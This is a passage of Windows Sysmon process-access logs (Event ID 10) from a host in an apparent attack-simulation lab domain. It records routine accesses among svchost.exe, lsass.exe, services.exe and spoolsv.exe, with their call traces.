07:55:24.028","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.841\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.841","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.841\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.841","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.841\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.841","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.888\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nSourceProcessId: 1304\r\nSourceThreadId: 1456\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.888","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","SourceProcessId":"1304","SourceThreadId":"1456","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.888\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nSourceProcessId: 1304\r\nSourceThreadId: 1456\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.888","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","SourceProcessId":"1304","SourceThreadId":"1456","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.966\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.966","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.966\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:24.966","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:24.966\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 